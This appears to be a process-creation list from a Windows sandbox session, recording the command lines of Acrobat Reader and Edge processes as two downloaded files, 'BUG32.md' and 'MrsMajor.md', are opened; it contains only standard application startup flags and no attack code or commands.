--content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=8F6A3CA4AF03EAF849DD7A013701E9F6 --renderer-client-id=2 --mojo-platform-channel-handle=1752 --allow-no-sandbox-job /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=33E4D998559D6D8909BA01E5C83BFB50 --mojo-platform-channel-handle=2320 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=62FAF29D1A8A7E2A7B64AAF580E3F496 --mojo-platform-channel-handle=1928 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=38C42D02671B42029D0101A00C4D9F08 --mojo-platform-channel-handle=2112 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7028 /prefetch:8
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\BUG32.md"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\BUG32.md"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=35E8933D6207A9F3620A6AF677591E43 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=35E8933D6207A9F3620A6AF677591E43 --renderer-client-id=2 
--mojo-platform-channel-handle=1668 --allow-no-sandbox-job /prefetch:1
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=6FD7AEBD204C8B14B508717460F44B75 --mojo-platform-channel-handle=1796 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=6802F27C812A6E19B228A68CBAFA06F3 --mojo-platform-channel-handle=2396 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=EF2C7D4B0439ACFFA169C73D338D879B --mojo-platform-channel-handle=2024 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=0573FAC77FCEB1425C4A072E6BEF1354 --mojo-platform-channel-handle=1800 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6352 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6928 /prefetch:8
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\MrsMajor.md"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\MrsMajor.md"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=43D57918781C2D37C1E3E9583E15C572 --mojo-platform-channel-handle=1720 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=90EC6EBBD9A3F49B812BB2E3EF5A4DBA --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=90EC6EBBD9A3F49B812BB2E3EF5A4DBA --renderer-client-id=2 
--mojo-platform-channel-handle=1732 --allow-no-sandbox-job /prefetch:1
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=8656B47BF98D81EAC2F95F65D61A2C4E --mojo-platform-channel-handle=2368 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=0161D8FECABDFBA3680B77550AA5233A --mojo-platform-channel-handle=2492 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=3A79E059FE43BF7066A97B59EF2F5BD5 --mojo-platform-channel-handle=2508 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6468 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6988 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6524 /prefetch:8
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6528 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5948 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6340 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3688 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5716 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1680 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6544 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6212 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7132 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1260 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6404 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6360 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7184 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
